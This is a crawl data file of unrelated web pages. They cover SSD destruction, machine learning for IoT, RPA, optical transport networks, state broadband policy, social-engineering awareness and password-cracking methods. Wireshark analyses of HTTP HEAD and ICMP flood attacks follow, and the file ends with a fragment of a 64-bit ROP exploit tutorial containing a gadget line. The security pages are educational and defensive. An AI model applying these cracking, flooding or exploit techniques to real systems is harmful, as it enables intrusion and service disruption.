When destroying HDDs and SSDs that are no longer needed, their technology must be taken into consideration. A degausser has the ability to erase information stored on a hard disk drive because it is magnetic media. However, a degausser will prove ineffective at erasing data from a solid state drive, because SSDs do not contain erasable magnetic coatings. Instead, solid state drives should be physically destroyed with a device like the SSMD-2MM Solid State Media Disintegrator. | <urn:uuid:607df032-38b4-493f-83ad-1d21a1ba24df> | CC-MAIN-2022-40 | https://datasecurityinc.com/solid_state_storage_devices.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.923399 | 319 | 3.453125 | 3 |
What is Machine Learning
Machine learning is a branch of artificial intelligence (AI) and is what allows computers to continuously learn and improve. What makes machine learning stand out is the fact that computers are able to ‘learn and improve’ on their own, without having to be programmed and re-programmed.
Machine learning is concerned with the creation of computer programs that can access data and learn on their own. Learning starts with data such as examples, direct experience, or teaching so that we can seek patterns in data and make better decisions in the future based on the examples we provide. The main goal of implementing machine learning is to allow computers to learn on their own, without the need for human interaction, and adapt their activities accordingly.
What is IoT?
The Internet of Things (IoT) is a network of physical devices (‘things’) that are embedded with sensors, software, and other technologies. What exactly makes these physical objects unique? It has to be their ability to connect and exchange data with other devices and systems over the internet. Such devices range in complexity from common household items to sophisticated industrial instruments.
Experts predicted more than 10 billion connected IoT devices by 2020, and 22 billion by 2025. Connecting these diverse products and attaching sensors to them gives devices a level of digital intelligence that makes the life of the everyday user a little easier, enabling devices to convey real-time data without involving a person.
Why use Machine Learning for IoT?
Machine learning can reduce human error and allow collected data to provide real-time insights. The insights produced allow IoT devices to fulfill their full potential. Together, machine learning and IoT surface insights hidden in data, enabling rapid automated responses and improved decision-making. By applying machine learning, IoT devices are able to predict and act on their own.
There’s never a dull moment when it comes to big data and artificial intelligence. Their benefits and future potential open doors to innovation across industries. Meanwhile, businesses are increasingly adding sensors in the hopes of increasing efficiency and lowering costs. According to InData Labs‘ machine learning consultants, however, sensors deployed without a suitable data management and analysis plan only make more noise and fill up more servers without being exploited to their full potential.
How is machine learning used for IoT?
1. Smart home
Smart home devices include everyday items such as smart lighting and TVs. So why integrate IoT sensors, machine learning models and algorithms, and big data analytics? The purpose of this integration is to make the home more helpful and responsive to the user’s needs and routines. By collecting data in real time, IoT platforms can predict those needs instead of relying entirely on commands and manually programmed routines.
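As a toy illustration of this kind of routine learning — the device, usage pattern and thresholds below are invented for the sketch — a predictor can simply count how often a device is on at each hour and use that frequency to anticipate the user:

```python
from collections import Counter

class RoutinePredictor:
    """Learns at which hours a smart-home device is usually on,
    then predicts the expected state for a given hour."""

    def __init__(self):
        self.on_counts = Counter()
        self.total_counts = Counter()

    def observe(self, hour, device_on):
        # Record one observation of the device's state at a given hour.
        self.total_counts[hour] += 1
        if device_on:
            self.on_counts[hour] += 1

    def predict_on(self, hour, threshold=0.5):
        # Predict "on" if the device was on at this hour most of the time.
        if self.total_counts[hour] == 0:
            return False  # no data for this hour yet
        return self.on_counts[hour] / self.total_counts[hour] >= threshold

# Simulate a week in which the lights are on during the evening (18-22h).
predictor = RoutinePredictor()
for day in range(7):
    for hour in range(24):
        predictor.observe(hour, device_on=18 <= hour <= 22)

print(predictor.predict_on(20))  # True: evening, lights usually on
print(predictor.predict_on(3))   # False: middle of the night
```

Real smart-home platforms use far richer features (day of week, occupancy, other devices), but the principle — learn from observed behavior rather than explicit programming — is the same.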
2. Smart cars
Autonomous vehicles may still be in the testing phase, but they have already become a reality in the automotive industry. By using supervised machine learning models and algorithms, car manufacturers are able to monitor how vehicles behave when faced with a wide range of scenarios and to develop advanced driver-assistance systems.
A few examples where machine learning is being used when driving a car include:
- Proactive detection and classification of objects
- Driver monitoring
- Driver replacement
- Sensor fusion
- Vehicle powertrain
The goal of machine learning is to mimic how the human brain analyzes information in order to develop logical responses. Machines require an algorithm in order to learn from training data and experience. Furthermore, as we gain more knowledge, we alter our reflexes, improve our skills, and begin to use our efforts judiciously. The goal of machine learning is to replicate this self-regulatory behavior in machines.
Data analysis automation
Consider the case of automobile sensors. When a car is on the move, hundreds of data points are recorded by inbuilt sensors. The data collected must be processed in real-time to avoid the possibility of accidents while also providing comfort to passengers. Because a human analyst would be unable to undertake such a task for each car, automation is the only option.
Machine learning allows the vehicle’s central computer system, similar to the central nervous system of a human, to learn about potentially harmful scenarios, such as speed and friction characteristics, and activate safety systems when required.
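A highly simplified sketch of such a trigger — the risk formula, weights and thresholds below are invented for illustration, not taken from any real vehicle system — might look like:

```python
def should_activate_safety(speed_kmh, friction_coeff, threshold=0.7):
    """Toy risk score: fast driving on a low-friction surface is risky."""
    # Normalize speed to a 0..1 range (assume a 200 km/h ceiling for the sketch).
    speed_risk = min(speed_kmh / 200.0, 1.0)
    # Icy road -> low friction coefficient -> high risk contribution.
    friction_risk = 1.0 - friction_coeff
    risk = 0.5 * speed_risk + 0.5 * friction_risk
    return risk >= threshold

print(should_activate_safety(160, 0.2))  # True: fast on an icy road
print(should_activate_safety(60, 0.9))   # False: slow on dry asphalt
```

In a learned system, the weights and threshold would be fitted from labeled driving data rather than hand-picked as they are here.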
The predictive power of Machine Learning
Looking back at the automobile sensor example, the true value of IoT rests not just in detecting immediate threats, but also in finding common patterns. For instance, the system may learn that a motorist takes corners too tightly or has trouble parallel parking. The system can then adapt to assist the driver with additional guidance.
What makes machine learning so valuable for IoT? Its most useful characteristic is its ability to recognize anomalies and automatically raise red flags, and it improves in accuracy and efficiency as it gains more knowledge about a phenomenon. Google’s use of machine learning to control its HVAC systems is a wonderful illustration of how this can save electricity.
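A minimal sketch of this kind of anomaly flagging — a simple z-score test on simulated sensor readings; real deployments use far more sophisticated models — could look like:

```python
import statistics

def find_anomalies(readings, z_threshold=2.5):
    """Flag readings that deviate strongly from the mean (z-score test)."""
    mean = statistics.fmean(readings)
    stdev = statistics.stdev(readings)
    # A reading is anomalous if it sits more than z_threshold
    # standard deviations away from the mean.
    return [x for x in readings if abs(x - mean) / stdev > z_threshold]

# Simulated temperature sensor: stable around 21 °C with one faulty spike.
temps = [21.0, 21.2, 20.9, 21.1, 20.8, 21.0, 21.3, 45.0, 21.1, 20.9]
print(find_anomalies(temps))  # -> [45.0]
```

An IoT platform would run a check like this continuously on incoming streams and raise an alert (or trigger an automated response) when an outlier appears.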
How has ADL helped with IoT?
Axiata IoT Platform: The Axiata IoT Platform provides a universal environment for smart, powerful IoT solutions and enables IoT device vendors to onboard and manage devices successfully. This cloud-based, agile, open-source platform is “right-sized” for the Axiata marketplace. Using this platform, device data can be collected and analytics performed on it in real time. The main objective of the platform is to support the generic IoT use cases of telco operators across the Developer, Enterprise, and Consumer domains.
Smart Greenhouse (mAgri): mAgri is a revolution in agriculture, creating a self-regulating microclimate suitable for plant growth through the use of sensors, actuators, automation, and monitoring/control systems that optimize growth conditions and automate the growing process.
Dialog SmartLife: SmartLife is a home automation mobile application, integrated with IoT services, that lets users plan and control their home devices from their own mobile device, making household management convenient. The application supports multiple device vendor platforms, eliminating the need to juggle several separate apps.
Smart City: A smart city solution monitors areas using different types of electronic IoT sensors and devices to collect data, then uses the insights gained from that data to manage assets, resources and services efficiently and to improve operations across the city. Widgets and dashboards populate data based on location anywhere in the city.
Massive amounts of data can be analyzed using machine learning. While it provides faster and more accurate results in identifying new revenue streams or risky threats, it does take a lot of time and resources to train it. Combining machine learning with artificial intelligence (AI) and cognitive technologies can improve its ability to process massive amounts of data.
Visit our services page to explore the variety of digital transformation services we offer businesses in the real world. From IoT, cloud solutions, business support services, and much more! | <urn:uuid:632c6482-dcb5-4390-9d66-33e3223aba5e> | CC-MAIN-2022-40 | https://www.axiatadigitallabs.com/machine-learning-for-iot-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.930421 | 1,465 | 3.421875 | 3 |
The goal here is to collect enough information to gain access to the target.
There are a few basic methods of password cracking:
Bruteforce: trying all possible combinations until the password is cracked.
Dictionary attack: This is a compiled list of meaningful words, compared against the password field till a match is found.
Rule based attack: If some details about the target are known, we can create rules based on the information we know.
Rainbow table: Instead of comparing passwords directly, the captured password hash is compared against a table of pre-computed hash values until a match is found.
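The dictionary and rainbow-table methods above both boil down to hashing candidates and comparing the results. A minimal dictionary-attack sketch (the wordlist and password are invented for illustration):

```python
import hashlib

def sha256_hex(password):
    # Hash a candidate password the way an unsalted system might store it.
    return hashlib.sha256(password.encode()).hexdigest()

def dictionary_attack(target_hash, wordlist):
    """Hash each candidate word and compare against the captured hash."""
    for word in wordlist:
        if sha256_hex(word) == target_hash:
            return word
    return None  # no candidate matched

wordlist = ["letmein", "password", "sunshine", "dragon"]
captured = sha256_hex("sunshine")  # unsalted hash leaked from a database
print(dictionary_attack(captured, wordlist))  # -> sunshine
```

Because the comparison happens against a leaked hash rather than a live login form, no rate limiting or lockout slows the attacker down.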
The rainbow table method gives the attacker an advantage because the hashes are compared offline, so no account lockout is triggered by wrong guesses. To defend against rainbow table attacks, salting can be used. Salting is the process of adding random data to a password before hashing it, so the attacker cannot crack the hash without also knowing the salt — and pre-computed tables become useless.
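A minimal sketch of salting (illustrative only — production systems should use a slow key-derivation function such as PBKDF2, bcrypt or scrypt rather than a single SHA-256 pass):

```python
import hashlib
import os

def hash_password(password, salt=None):
    """Return (salt, hash) where hash = SHA-256(salt + password)."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per password
    digest = hashlib.sha256(salt + password.encode()).hexdigest()
    return salt, digest

# The same password hashed twice yields two different stored hashes,
# so a pre-computed rainbow table cannot match either of them.
salt1, h1 = hash_password("sunshine")
salt2, h2 = hash_password("sunshine")
print(h1 == h2)  # False

# Verification re-hashes the login attempt with the stored salt.
print(hash_password("sunshine", salt1)[1] == h1)  # True
```

The salt is stored alongside the hash; it isn’t secret, it just forces the attacker to crack each account individually instead of reusing one pre-computed table.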
Types of Password Attacks
Passive online attacks
A passive attack is an attack on a system that does not result in a change to the system in any way.
The attack is to purely monitor or record data.
Man in the middle
Active online attack
An active online attack is the easiest way to gain unauthorized administrator-level access to the system
Offline attacks occur when the intruder checks the validity of passwords without interacting with the target system. Offline attacks are often time-consuming.
Non-electronic attacks are also known as non-technical attacks. This kind of attack doesn't require any technical knowledge about the methods of intruding into another system.
How to defend against password cracking:
Don't share your password with anyone
Do not use the same passwords during password change
Enable security auditing to help monitor and track password attack
Do not use cleartext protocols and protocols with weak encryption
Set the password change policy to 30 days
Monitor the server’s logs for brute force attacks on the user’s accounts
Avoid storing passwords in an unsecured location
Never use passwords such as date of birth, spouse, or child’s or pet’s name
Enable SYSKEY with a strong password to encrypt and protect the SAM database
Lockout an account subjected to too many incorrect password guesses. | <urn:uuid:f9337276-9667-494a-a28d-d93b14fcb65b> | CC-MAIN-2022-40 | https://www.greycampus.com/opencampus/ethical-hacking/gaining-access | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.903573 | 533 | 3.484375 | 3 |
With the rise of robots, many employees are afraid of losing their jobs. However, in the digital workplace, the ideal team combines people and robots. Together, these two types of workforces enable companies to become more efficient, productive and competitive.
How do robots affect the workplace?
The idea of self-operating machines has long been a staple of science fiction. Fiction has now become reality as robots are playing a fundamental role in many industries, with automation technology leading the way.
Nowadays, automation software including RPA (Robotic Process Automation) is widely implemented in sectors such as medical, manufacturing, retail and finance. Whichever industry the solution is applied in, these virtual assistants provide time savings, higher efficiency and improved productivity in the workplace.
In detail, robots can finish repetitive tasks faster and more precisely than humans, a fact that makes many employees fear losing their jobs. In practice, however, from a workforce perspective, RPA bolsters staff satisfaction by dealing with monotonous tasks, allowing employees to focus on higher-value work that robots cannot handle.
People can when robots can’t
Be a critical thinker, be creative
As mentioned above, instead of doing repetitive tasks, humans should concentrate on creative work. Bots can only perform the tasks they have been programmed for. The addition of artificial intelligence will no doubt make them smarter and able to improve over time. However, everything has a first time.
As an illustration, customer service sometimes needs flexibility. Automation bots usually learn from previous experience, which is based on a human’s solution. When a customer contacts you with a problem unrelated to the product or service, automation cannot deal with it. This is when an employee’s creativity is needed.
Gain trust with a person
Trust is established by consistent good behavior from both sides. Apparently, a robot does not have feelings or sympathy for customers. There are many nuances to relationships that robots will never replicate in their relationships with humans. Being able to empathize with the position of the customer forms the basis for a strong emotional relationship.
For example, a rigid, rule-bound robot can make angry customers even more upset with the service, whereas an ingenious staff member with years of experience can handle the situation smoothly. In short, sympathy and creativity are what set humans apart from robots.
The perfect team: People and robots
As the industrial revolution redefined the way businesses operate, digital transformation is crucial. This raises a question for leaders on how to use the human and virtual workforce in operational activities. Therefore, the key lies in the balance between the human and robots with the goal of maximizing the use of technology while also focusing on creative work of employees.
More and more companies are deploying robots to perform programmed tasks, while people adapt the way they work to the circumstances. By dividing tasks between these two workforces, businesses can save time. This revamped team is arguably the perfect combination, giving leaders timely data and information for important decisions.
There are ways to integrate this labor model inside organisations. But, the main goal is that people and robots both have strengths which should be focused on to exploit the maximum potential.
- RPA: How Robots and Humans Can Work Together
- Five things that robots can’t do but people can
- What Basic RPA Cannot Do? #3 Tasks that you Should NEVER Entrust Basic RPA
- Humans and robots work better together following cross-training
- Why Humans and Robots Working Together Will Become Essential for Business Success
akaBot (FPT Software) is the operation optimization solution for enterprises based on RPA (Robotic Process Automation) platform combined with Process Mining, OCR, Intelligent Document Processing, Machine Learning, Conversational AI, etc. Serving clients in 20+ countries, across 08 domains such as Banking & Finances, Retails, IT Services, Manufacturing, Logistics…, akaBot is featured by Gartner Peer Insights, G2, and ranked as Top 6 Global RPA Platform by Software Reviews. akaBot also won the prestigious Stevie Award, The Asian Banker Award 2021, etc.
Leave us a message for free consultation! | <urn:uuid:cfabf64e-7493-470b-89b3-126f1ace1f48> | CC-MAIN-2022-40 | https://akabot.com/additional-resources/blog/what-do-people-do-when-bots-are-already-onboard/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00154.warc.gz | en | 0.9404 | 867 | 2.65625 | 3 |
What is OTN (Optical Transport Network) in telecommunications?
September 12, 2018
Optical Transport Networking is a telecommunication industry-standard protocol which provides a way of multiplexing different services onto optical light paths. It was originally designed to promote network evolution beyond SONET/SDH.
As network service providers tackle the ever-increasing issue of rapid user growth and increasing digital traffic, with such things as mobile apps, social media, cloud computing, VoIP and video calling, technological solutions such as OTN are being adopted.
Unlike the circuit-based networks of the past, which often comprised predictable connections between pairs of endpoints, the majority of modern networks are packet-based and carry many services and applications that vary in their bandwidth and transmission-performance demands.
By wrapping each payload transparently into a container (also known as a digital wrapper), OTN’s enhanced multiplexing capabilities allow for different traffic types such as storage, ethernet, video and SONET/SDH to be carried over a single Optical Transport Unit (OTU) frame. It also preserves the client’s native structure, timing information and management information within the container.
There are significant advantages to OTN compared with traditional WDM networks, including increased efficiency and reliability. With OTN, networks can be scaled to 100G and beyond, and OTN also plays a crucial role in making the network programmable, enabling transport to become as important as computing and storage in intelligent data center networking.
Benefits of Optical Transport Networking
- Lower cost: Being able to transport multiple clients on a single wavelength, OTN offers an economical way of filling optical network wavelengths and avoiding unnecessary cost.
- Performance: By allowing specific configuration of bandwidth to each service or group of services, OTN allows performance to be managed for each client.
- Spectral efficiency: OTN offers efficient use of DWDM capacity by ensuring consistent fill rates across a network.
- Flexibility: OTN networks allow the operator to tailor their technologies at the time, while allowing for adoption of further technologies as and when clients require them.
- Security: By utilising hard partitioning of traffic on dedicated circuits, OTN has a high level of privacy and security.
Carritech provide support service for a range of OTN products, including supply, repair and refurbishment, sale and system support. For more information and to find out how we can help you, contact us today.
Get all of our latest news sent to your inbox each month. | <urn:uuid:f63cf9e1-45bd-49cf-8c15-874577c97e4b> | CC-MAIN-2022-40 | https://www.carritech.com/news/what-is-otn/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00154.warc.gz | en | 0.934468 | 523 | 2.78125 | 3 |
As broadband took center stage as one of the main characters in the COVID-19 pandemic this past year, several states across the US made moves to increase access to high-speed Internet through funding allocation, legislation and the creation of broadband offices.
Pew Charitable Trusts breaks down that progress in a recent report. Here are some of the highlights:
Funding: According to Pew, 12 state legislatures in 2020 allocated between $1.5 million and $51 million to existing broadband funds or other state entities responsible for financing broadband.
Further, six states (Arkansas, Kansas, Kentucky, Michigan, Oregon and Pennsylvania) established new broadband funds, bringing the number of state broadband funds in the US to 37.
State broadband offices: Several states also created new broadband entities to oversee stakeholder engagement, data management, planning and grant administration. Florida, Kansas and Louisiana established broadband offices; while Colorado, Oklahoma, West Virginia and Wisconsin created broadband task forces. Additionally, the governors of Colorado, Kansas and Wisconsin expanded their existing broadband programs through executive orders.
Local and municipal broadband: Several states also passed laws to enable electric co-ops and municipalities to participate in providing broadband. That includes Arizona, Indiana, Louisiana, South Carolina and West Virginia, which passed legislation authorizing electric or telephone cooperatives to use or lease their utility equipment to provide last-mile service.
New Hampshire and Vermont also passed bills in 2020 "that allow municipalities to form communication union districts—two or more towns that join to build broadband infrastructure—and provide broadband services to residents," according to Pew.
"States have recognized that getting unserved communities online requires lowering barriers to entry—such as the availability of middle mile infrastructure, particularly for nontraditional providers. Adding tools to the toolbox creates more opportunities to bring connections to communities that might otherwise not have access to reliable, high-speed broadband," writes Pew.
Cable is 'terrified'
Not everyone is on board with adding such "tools to the toolbox," with Republicans on Capitol Hill arguing in recent hearings on rural broadband that these municipal programs tend to fail and thus private providers should be incentivized through forthcoming federal legislation to build out America's remaining broadband infrastructure.
However, Ernesto Falcon, senior legislative counsel at the Electronic Frontier Foundation (EFF), says that the only way to get to universal access is with a public broadband model, and that these concerns around municipal broadband reflect cable companies' priorities and not the needs of the nation.
"The obsession with the handful of failures that exist out there really just ignores the rapid success... I mean, the most successful fiber network in the world is a city: Chattanooga," says Falcon, adding that we should "absolutely" include municipalities in broadband funding measures as the government is going to be "most poised" to provide low-income access.
"I think the emphasis is really driven by cable... I'll say very clearly why we have cable telling members of Congress, 'oh yeah, municipal fiber is a bad idea,' is they're terrified of the idea of entities who can take the 30-to-40 year long-term view of 21st century access and deliver multi-gigabit Internet when they just don't want to do that," says Falcon.
"They don't want to have to spend the money necessary to keep up with that," he says. "The longer they can pull that off in more places, then the less money they have to spend on their own networks.
"I think that's an unfortunate motivation, but that is what's driving that debate."
— Nicole Ferraro, contributing editor and host of "The Divide" and "What's the Story?" Light Reading | <urn:uuid:d90ebbf0-036b-42a0-a955-98c68aef3828> | CC-MAIN-2022-40 | https://www.broadbandworldnews.com/document.asp?doc_id=769654&print=yes | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00154.warc.gz | en | 0.951168 | 753 | 2.5625 | 3 |
January 2019 is National Slavery and Human Trafficking Prevention Month
Human trafficking has been a federal crime in the United States since The Trafficking Victims Protection Act of 2000 was passed into law as a federal statute. Each year since 2010 has been designated National Slavery and Human Trafficking Prevention Month with January 11th each year being observed as National Human Trafficking Awareness Day.
ADF has been committed to helping law enforcement end human trafficking and child exploitation since our founding in 2006 and the launch of our industry leading digital forensic triage software which enables law enforcement to quickly and easily collect, analyze and report on digital evidence. ADF's founders, J.J. Wallia and Raphael Bousquet, coined the term triage as it relates to digital forensics because of the need for speed in identifying victims and suspects in criminal investigations.
Each year, various federal agencies and organizations use National Slavery and Human Trafficking Prevention Month to raise awareness and educate the public on ways to help end and eradicate slavery and human trafficking. Participating agencies and organizations typically include:
- Department of Justice
- Department of Homeland Security
- Department of Defense
- Department of Health and Human Services
- Department of State
- United States Conference of Catholic Bishops
- Human Rights First
- Polaris Project
According to the White House, "In 2017 alone, the Department of Justice secured convictions against more than 500 defendants in human trafficking cases and the Federal Bureau of Investigation dismantled more than 42 criminal enterprises engaged in child sex trafficking. The Department of Homeland Security initiated more than 800 human trafficking cases, resulting in at least 1,500 arrests and 530 convictions. "
ADF supports investigators and digital first responders around the globe making it easy for them to quickly collect, analyze and report on digital evidence -- a critical element in the fight against slavery, human trafficking and child exploitation. We offer specialized digital forensic search profiles designed to investigate Human Trafficking. Learn more and request to receive access to ADF's Anti-Human Trafficking Search Profiles. | <urn:uuid:95725db3-992f-4547-84d3-a6ae0f1cf600> | CC-MAIN-2022-40 | https://www.adfsolutions.com/news/human-trafficking-prevention-month | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00154.warc.gz | en | 0.936745 | 409 | 2.828125 | 3 |
Don’t be victimized:
“Social Engineering” scams
One of the most effective and dangerous techniques criminals use to commit their crimes is called social engineering, and it’s vitally important that you learn how to recognize this serious threat.
Social engineering uses social interaction as the primary means to trick or persuade you to disclose confidential information that can then be used against you.
Social Engineering scams can happen:
- In person
- Over the phone
- Through phishing email scams
The main goal of social engineering is to trick you into providing the criminals with valuable information that can later be used to steal data and obtain funds illegally.
Cyber-criminals are excellent students of human behavior and will spend significant time studying the predictable behavior of their victims. The purpose of their study is simple – to create attack strategies and scenarios that will take full advantage of your predictable behavior, and use your mistakes to steal your information.
Some of the techniques that hackers may utilize to victimize you:
- Researching your social media and online accounts. Criminals look at your postings on social media and elsewhere on the Internet for background data that can later be used to trick you into providing information. This can also include studying your friends' and family members' postings to gather intelligence that can be used to lure you into their scam.
- Ruse phone calls to gain initial information. Exploiting your willingness to be helpful and openly provide sensitive information.
- Phishing email messages posing as friends, family or co-workers.
- Emails or calls posing as a company you do business with.
These are just some of the warning signs that a hacker may be trying to socially engineer you:
- Any request for personally identifiable information – PII
(PII is defined as “any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual’s identity, such as name, social security number, date and place of birth, mother’s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.”)1
- Creation of a sense of urgency or emergency to force your fast action without time to react appropriately.
- Excessive flattery or attempts at persuasion through flattery.
- Threats: “if you don’t do it, you’ll get in trouble or there will be ramifications.”
- Refusal to give a call back number or unwillingness to provide normal contact information.
Because most social engineering attacks are attempts to gain information that an attacker can’t easily get elsewhere, the mere fact that a stranger asks for the information should be a clear warning. Recognizing the possible signs that a criminal is attempting to socially engineer you is now important every day.
- Never give any confidential information to someone you don’t know, and especially never to a telephone caller.
- Take your time, and independently verify any contact that requests your sensitive PII data.
- Limit the information you share on social media sites.
Security awareness training will reduce risk! We must think about our security every day. Don't wait until you or your family have been victimized to do something to protect yourself. It is important to understand the day-to-day risks and help ensure that your data is protected. Cybercriminals depend on your lack of vigilance to strike when you least expect it.
Want to Learn More?
If you want to protect your employees and your business from being victimized by social engineering scams, contact CFISA today at (561) 325-6050 to learn how we can help.
Founded by Michael Levin, a former Secret Service agent and Deputy Director of the National Cyber Security Division of the Department of Homeland Security, the Center for Information Security Awareness (CFISA) is designed to help businesses, government agencies, and academic institutions empower their employees to fight cybercrime. We provide personalized, engaging, compliant, and affordable training in PCI-DSS, HIPAA, InfraGard Awareness, and Cyber Security Awareness.
Remember, no matter how big or small your company is, and how well the back doors to your system are barricaded, one employee click on the wrong link, attachment, or website could open the front door. CFISA trains your employees on the best practices to avoid potentially catastrophic data breaches. Call us today at (561) 325-6050 to learn how we can help.
HTTP HEAD flood is a layer 7 DDoS attack that targets web servers and applications.
Layer 7 is the application layer of the OSI model. HTTP is the Internet protocol that underlies browser-based requests and is commonly used to load web pages and to send form contents over the Internet.
HTTP HEAD floods are designed to overwhelm a web server's resources by continuously requesting one or more URLs from many attacking source machines that simulate HTTP clients, such as web browsers (though the attack analyzed here does not use browser emulation).
An HTTP HEAD flood consists solely of HEAD requests, unlike other HTTP floods, which may mix in other request methods such as POST, PUT, and DELETE.
When the server’s limits of concurrent connections are reached, the server can no longer respond to legitimate requests from other clients attempting to connect, causing a denial of service.
HTTP HEAD flood attacks use standard URL requests, hence they may be quite challenging to differentiate from valid traffic. Traditional rate-based volumetric detection is ineffective at detecting HTTP HEAD flood attacks, since the traffic volume in HTTP HEAD floods is often under detection thresholds.
Before sending an HTTP HEAD request, a TCP connection between the client and the server is established using the 3-way handshake (SYN, SYN-ACK, ACK), seen in packets 94, 107, and 108 in Image 1. The HTTP request itself will be in a PSH, ACK packet.
Image 1 – Example of TCP connection
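As a rough illustration of what rides in that PSH, ACK packet, an HTTP HEAD request is only a few lines of text. The sketch below builds one; the host, path, and User-Agent string are invented for the example:

```python
def build_head_request(host, path="/"):
    """Build the raw bytes of a minimal HTTP/1.1 HEAD request.

    This is the payload that rides in the PSH, ACK packet once the
    3-way handshake (SYN, SYN-ACK, ACK) has completed.
    """
    lines = [
        "HEAD %s HTTP/1.1" % path,
        "Host: %s" % host,
        "User-Agent: example-client/1.0",  # hypothetical User-Agent string
        "Connection: keep-alive",          # holds the connection open, consuming a server slot
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")

request = build_head_request("victim.example", "/index.html")
```

Because the request is tiny and syntactically valid, each one is cheap for the attacker to send and indistinguishable, on its own, from a legitimate client probe.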
An attacker (IP 10.128.0.2) sends HTTP/1.1 HEAD requests, while the target responds with HTTP/1.1 200 OK as seen in Image 2.
In this flow we see an HTTP/1.1 200 OK response, but that might change depending on the web server's settings.
Image 2 – Example of HTTP packets exchange between an attacker and a target:
The capture analyzed is around 3 seconds long and contains an average of 79 PPS (packets per second), with an average traffic rate of 0.06 Mbps (considered low; an attack you are analyzing could be significantly higher).
Image 3 – HTTP HEAD Flood stats
Analysis of HTTP HEAD Flood in WireShark – Filters
“http” filter – Will show all http related packets.
“http.request.method == HEAD” – Will show HTTP HEAD requests.
It will be important to review the user agent and other HTTP header structures as well as the timing of each request to understand the attack underway.
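Because a single HEAD request looks legitimate, per-source request timing is one complementary check. The sketch below is a toy heuristic, not a production detector: the tuple layout and threshold are our own assumptions, with the (timestamp, source, method) tuples imagined as pre-extracted from a capture using the filters above.

```python
from collections import defaultdict

def suspicious_head_sources(packets, window=1.0, threshold=20):
    """Flag sources sending more than `threshold` HEAD requests within
    any `window`-second span.  `packets` is an iterable of
    (timestamp, src_ip, method) tuples, e.g. pre-extracted from a
    capture with the "http.request.method == HEAD" filter.
    """
    times = defaultdict(list)
    for ts, src, method in packets:
        if method == "HEAD":
            times[src].append(ts)

    flagged = set()
    for src, stamps in times.items():
        stamps.sort()
        left = 0
        for right in range(len(stamps)):
            # Shrink the window from the left until it spans <= `window` seconds.
            while stamps[right] - stamps[left] > window:
                left += 1
            if right - left + 1 > threshold:
                flagged.add(src)
                break
    return flagged
```

A sliding window like this catches bursty senders that a whole-capture average would smooth out, which matters precisely because HEAD floods tend to stay under volumetric thresholds.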
Download example PCAP of HTTP HEAD Flood attack
*Note: IPs have been randomized to ensure privacy.
Download
ICMP Floods are DDoS attacks aimed at consuming computing power and saturating bandwidth. ICMP Floods are generally spoofed attacks and normally come at a very high rate.
Time Exceeded ICMP Floods, if not dropped by DDoS mitigation devices on the perimeter, may overwhelm the internal network architecture. This type of ICMP packet is usually a response, but since the protocol is not stateful, some mitigation devices might let it into the internal network. Generally, this flood is basic but effective, used to bring down perimeter devices or saturate bandwidth.
As seen in Image 1, an ICMP Flood of type 11 consists of a high volume of ICMP Time Exceeded packets. These packets carry a source IP (normally spoofed to reduce the effect of IP reputation mechanisms) and the destination IP of the victim.
“Image 1: The IP of the attacker and the victim”
As shown in Image 2, the packet is an ICMP type 11 packet (Time Exceeded).
“Image 2: ICMP type 11, Additional Information”
Analysis of ICMP (Type 11) Flood in Wireshark – Filters:
To filter only ICMP packets, you can simply use the “icmp” filter. To specifically filter ICMP Time Exceeded responses, use “icmp.type == 11”. If you see many such packets arriving within a short time frame, you could be under an ICMP Time Exceeded (Type 11) Flood attack.
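The same check can be scripted outside Wireshark. The ICMP type is simply the first byte of the ICMP header (byte 1 is the code, bytes 2-3 the checksum), so a minimal classifier needs only `struct`; the sample payloads used below are fabricated, not taken from the PCAP:

```python
import struct

ICMP_TIME_EXCEEDED = 11  # ICMP type 11

def icmp_type(icmp_bytes):
    """Return the ICMP type field: byte 0 of the ICMP header.

    Header layout: type (1 byte), code (1 byte), checksum (2 bytes).
    """
    type_, _code, _checksum = struct.unpack("!BBH", icmp_bytes[:4])
    return type_

def count_time_exceeded(payloads):
    """Count how many raw ICMP payloads are Time Exceeded (type 11)."""
    return sum(1 for p in payloads if icmp_type(p) == ICMP_TIME_EXCEEDED)
```

A high count of type 11 packets that were never solicited by outbound traffic is the scripted equivalent of the “icmp.type == 11” filter lighting up.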
Download example PCAP of ICMP Time Exceeded (Type 11) Flood:
*Note: IPs have been randomized to ensure privacy.
Download an ICMP Time Exceeded (Type 11) Flood PCAP | <urn:uuid:a68375b5-aeb8-486e-90d7-67c0876a7981> | CC-MAIN-2022-40 | https://kb.mazebolt.com/knowledgebase/icmp-time-exceeded-flood/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00154.warc.gz | en | 0.890984 | 372 | 2.859375 | 3 |
In part 12, we completed the ROP bypass of the DEP in 64 bits. In this part, we’ll analyze and adapt the RESOLVER for 64 bits.
Resolution of the 64-Bit Exercise
As a quick point of clarification, the shellcode is not mine. However, it is quite public, so it was simply adapted for this example.
Complete Solution Script
Just to mix things up a bit, let’s start out by looking at the complete solution that concludes by running NOTEPAD.
Now, let’s see how it works.
Above we can see the shellcode with the resolver that will be explained later.
There is also a gadget that has been changed:
rop+=struct.pack("<Q",0x1400060b7) # ADD RAX, 0x20 # CHANGED to have more space
Initially, this gadget was adding 0x28 to RAX before running. It was altered to instead only add 0x20 in order to conserve space.
